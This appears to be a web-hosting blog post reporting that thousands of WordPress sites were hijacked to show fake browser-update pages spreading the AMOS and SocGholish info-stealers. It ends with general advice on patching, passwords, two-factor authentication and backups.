WordPress Sites Hacked And Hijacked For Windows & Mac Malware

Summarize with:

ChatGPT

Claude

Perplexity

Despite how much we all rely on the Internet, it’s no secret that browsing does come with hidden and not-so-hidden dangers, eg WordPress sites hacked. A recent report has uncovered a new one affecting WordPress websites and how they are being corrupted and used to spread malware to both Windows and Mac users. This post goes into the details of this latest online threat, how hackers are compromising sites, the types of malware & what they do, and the potential consequences for unsuspecting visitors.

KEY TAKEAWAYS

• The widespread compromise of WordPress sites shows that no platform is immune to security threats, especially when proper maintenance and updates are neglected
• This latest malware campaign uses social engineering, lack of knowledge, and multi-platform attacks to maximize their reach and effectiveness.
• Cross-platform malware campaigns represent a growing threat, and the impact can be devastating, leading to data loss, financial theft, and identity fraud.
• Prevention through regular maintenance and security best practices remains the most effective defense against website compromise and malware distribution.

What Is the Latest Hack?

We’ve been reporting a fair amount about WordPress news, and it seems that the world’s most popular CMS (Content Management System) can’t seem to ‘catch a break’. This time, it has nothing to do with the powers that be and how the platform is being run. Instead, there has been a wave of hackers, that are hijacking WordPress websites to spread malware that infects both Windows and Mac operating systems… the fun just never ends.

Websites (including those built on WordPress) that have being taken over by cybercriminals, used to spread viruses, phishing scams, and the myriad of other types of malware to steal sensitive data, is nothing new.

WordPress powers the backend of over 43% of all websites on the Internet, and most visitors don’t know it. While there’s nothing wrong with that, it comes with some fairly unique vulnerabilities when it comes to the core software and the plugins that are available in the WordPress.org library.

While WordPress is generally pretty safe, a recent report by cybersecurity company: c/side.dev, has unveiled a rather alarming new hack that is making the rounds.

C/side is a company that specializes in detecting and preventing browser attacks, particularly those involving third-party scripts. They have uncovered a trend where hackers specifically target and corrupt WordPress sites running outdated software to gain unauthorized access by exploiting gaps in any outdated plugins and core software versions.

The report states that thousands of sites have been identified as hijacked, turning them into unwilling distribution points for a rather nasty code. The short version is that hackers target Windows and Mac operating systems via browsers, to trick online visitors into downloading and installing information-stealing malware.

According to c/side’s findings, this campaign has impacted over 10,000 WordPress websites globally. Simon Wijckmans, c/side founder and CEO, says it is still “very much live,” with some of the hacked sites being among the most popular on the web.

By using the detection techniques they’re known for, including internet crawling and reverse DNS lookups, to find infected sites and domains hosting malicious scripts. This led the c/side team to discovering the full extent of the campaign.

Himanshu Anand wrote up the company’s findings and said, “This is a widespread and very commercialized attack,” calling it a “spray and pray” attack. This means it will affect anyone visiting an infected site rather than targeting specific people, groups, or businesses.

How The Malware Infection Works

As we’ve covered, hackers are hijacking WordPress sites to spread malware for stealing passwords and other personal information from both Windows and Mac users. The way they are doing it usually works like this:

First, they find and target WordPress sites with outdated core software (the latest version is 6.7.1) and/or plugins with known vulnerabilities that allow them to gain unauthorized access.

Once they have gained access, the attackers inject JavaScript code into the website. This code is designed to detect the user’s operating system (either Windows or macOS) and deliver the malware designed for that browser by triggering a fake page within an iframe.

Iframes are an HTML element that allows you to embed another HTML document on a current webpage. In this context, the iframes are used to display the fake update page and can be done in a few ways, for example:

• Redirection: The malicious script injected into the WordPress site might subtly redirect the user’s browser to the fake update page within an iframe, making the redirect less obvious.
• Overlay: The fake page, contained in the iframe, could be overlaid on top of the legitimate website content, making it appear that the update notification is part of the website.

When users visit the compromised page, the injected script redirects them to a page that looks legitimate with a browser notification, prompting them to click on and download an update to view the intended site.

Finally, if the visitor installs the “update”, they will instead be downloading a file containing malware that can steal their passwords and other sensitive personal and financial information.

A Windows and Mac Double Threat

It is not the most sophisticated attack, given that the hackers rely on people falling for the fake update notification and subsequently installing the malware themselves. This means that the user unwittingly runs it, instead of the hacker, and manually bypasses their Windows and/or Mac’s built-in security.

The two types of malware that are used on the infected sites are Amos Atomic Stealer (AMOS) for macOS and SocGholish for Windows. Both are classified as info-stealers that run in the background without the user being aware until after the “damage” has been done.

As the name implies, they are designed to steal as much sensitive information as possible, including usernames and passwords, session cookies, and other data that will give hackers access into the victim’s accounts and crypto wallets to take as much information and digital currency as they can.

To make matters worse, another cybersecurity company reported that it had found hackers who were selling access to AMOS, on Telegram.

This means that its creators are offering it as Malware-as-a-Service (MaaS) to other cybercriminals, who can then use it for their own attacks, kind of like Software-as-a-Service (SaaS) but for jerks.

WordPress Sites Hacked – Impact and Implications

The dual-threat nature of this campaign, targeting both Windows and Mac users, is a new low in malware distribution.

Compromising legitimate websites and turning them into online versions of Patient Zero, is a particularly effective way of getting around the traditional security of both operating systems, while preying on the general trust most people tend to have when visiting these well-known WordPress websites.

The risks of unsecured websites and the consequences of a successful infection can be disastrous. Not only can the stolen login credentials can give hackers access to personal accounts, including banking, email, crypto wallets, and social media, but the stolen data can be used for identity fraud, stolen funds, and create other nasty problems for victims, both financially and personally, potentially causing damage to businesses and reputations.

Automattic’s Response

Automattic, one of the main companies that that owns and manages WordPress.org and assists in the development of the WordPress CMS, was told about the hack and hijack by c/side and sent the list of malicious domains. Their contact at the company acknowledged receipt of their email.

Automattic said that the security of third-party plugins is ultimately the responsibility of the developer, with a spokesperson quoted as saying:

“There are specific guidelines that plugin authors must consult and adhere to ensure the overall quality of their plugins and the safety of their users. In addition, they have at their disposal a Plugin Handbook that covers numerous security topics, including best practices and managing plugins’ security,”

In all fairness, that statement has merit. The core WordPress software is regularly updated, and plugin developers should make sure their software is “as secure as possible”; it also begs the question: What, if anything, will Automattic do about it?

After all, technically speaking, WordPress is their baby, and great websites are built using it, while some are being used for less-than-savory purposes.

How You Can Prevent Falling Victim to Hacking Attempts

The massive scale and number of hijacked sites highlights the importance of regularly updating plugins, themes, and WordPress to the latest versions as soon as possible. These updates patch known security gaps, minimizing the risk of harmful code infections and other exploits.

Neglecting updates can leave your WordPress site vulnerable, potentially exposing you and your visitors to data breaches and theft.

To protect against this hack and other cyber threats:

• Regular Updates: This is the most important one. In this scenario, outdated WordPress core software and plugins are the primary ways your website can get hacked. Enable automatic updates where possible.
• Strong Passwords: Use unique passwords with upper- and lower-case letters, numbers, and special characters. Avoid using names, common words, birthdays, etc. and have different ones for different accounts.
• Enable Two-Factor Authentication (2FA): 2FA adds an extra layer of security, making it much harder for attackers to gain access even if they have stolen a password.
• Limit Login Attempts: This can help prevent brute-force attacks and unauthorized access.
• Monitoring: Use security plugins or tools to scan for vulnerabilities and monitor suspicious activity with a Web Application Firewall (WAF) to filter and block harmful traffic.
• Backups: In case of a successful attack, having recent backups of your files and data is essential for restoring your WordPress website as quickly as possible. Always test your recovery methods to ensure it works correctly.
• Security Plugins: Look at a well-coded and maintained security plugin that offers a comprehensive set of features, including malware scanning, firewall protection, and intrusion detection.

You should NEVER download updates or files from untrusted sources when browsing the Internet. This is especially important for any unexpected prompts or new windows, even if they appear on a website you trust.

Always verify that updates come directly from the official source, such as your browser’s settings or that particular software’s website—similarly, only download apps from official app stores or trusted sources.

Like the WordPress CMS and plugins, regular updates patch security vulnerabilities in your browser and operating system, reducing the risk of malware infections.

FAQs

Other Blogs of Interest

– Choose a Security Focused Hosting Plan

– Secure Website Hosting: 6 Important Facts You Need To Know

– Web Hosting Security – Top 11 Best Practices

– Shared Hosting for Fast and Secure Websites

– Domain Security: Best Practices